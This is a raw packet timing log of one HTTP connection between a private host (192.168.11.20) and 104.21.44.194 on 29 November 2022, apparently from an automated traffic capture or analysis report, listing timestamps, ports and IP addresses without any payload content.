                                                                          Nov 29, 2022 09:20:40.414760113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414760113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414937973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.427757978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436281919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436295986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436316967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436444998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436480999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436492920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436503887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436515093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436527014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436537981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436548948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436562061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436573982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436584949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436589956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436589956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436595917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436608076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436620951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436631918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436641932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436652899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436664104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436811924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436815977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436882973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436894894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436906099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436916113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436927080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436938047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436948061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436959028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436969995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436980963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436994076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437006950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437017918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437028885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437040091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437051058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437062025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437155962 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437174082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437174082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437174082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437174082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437174082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437201023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437206030 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437206030 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437212944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437223911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437237978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437248945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437259912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437271118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437282085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437292099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437303066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437314034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437325001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437335968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437347889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437407970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437407970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437407970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437444925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437457085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437468052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437479019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437489986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437500954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437511921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437522888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437532902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437544107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437555075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437566042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437576056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437587023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437597990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437608957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437618971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437630892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437639952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437639952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437639952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437639952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437639952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437731028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437741995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437752962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437763929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437774897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437786102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437797070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437808037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437810898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437810898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437810898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437810898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437810898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437819004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437829971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437844038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437855959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437866926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437958956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437958956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.437958956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438165903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438165903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438165903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438321114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438333035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438344002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438354969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438364983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438375950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438574076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438585043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438596010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438606977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438617945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438627958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438638926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438642979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438643932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438643932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438643932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438649893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438661098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438671112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438682079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438818932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438859940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438873053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438884020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438894987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438905954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438916922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438927889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438939095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438950062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438960075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438971043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438982010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.438983917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438983917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438983917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.438983917 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439160109 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439160109 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439160109 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439160109 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439203024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439214945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439225912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439237118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439248085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439258099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439269066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439280033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439291000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439301014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439311981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439322948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439332962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439343929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439354897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439364910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439376116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439388037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439398050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439409018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439419985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439486980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439486980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439486980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439486980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439486980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439659119 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439660072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.439795971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439807892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439819098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439830065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439841032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439852953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439862967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439873934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.439886093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440021992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440069914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440082073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440093994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440105915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440119028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440130949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440143108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440160036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440172911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440243006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440382957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440396070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440407038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440412998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440418005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440428972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440439939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440450907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440464020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440475941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440488100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440630913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440630913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440630913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440630913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440630913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440633059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440644979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440654993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440666914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440677881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440689087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440699100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440711021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440721989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440732002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440742970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440753937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440766096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440777063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440834045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440834045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.440908909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.440921068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.441003084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.441003084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.441003084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.441003084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.441003084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.441171885 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.448955059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449059963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449070930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449081898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449148893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449160099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449170113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449181080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449191093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449235916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449245930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449256897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449269056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449280977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449290991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449301958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449318886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449327946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449327946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449327946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449327946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449330091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449341059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449352026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449362993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449500084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449609995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449621916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449634075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449645996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449656010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449666023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449667931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449837923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.449897051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449907064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450145006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450145006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.529704094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538132906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538238049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538249016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538259983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538285971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538343906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538369894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538383007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538393974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538404942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538414955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538427114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538439989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538450003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538460970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538471937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538481951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538492918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538502932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538513899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538707972 CET4985280192.168.11.20104.21.44.194
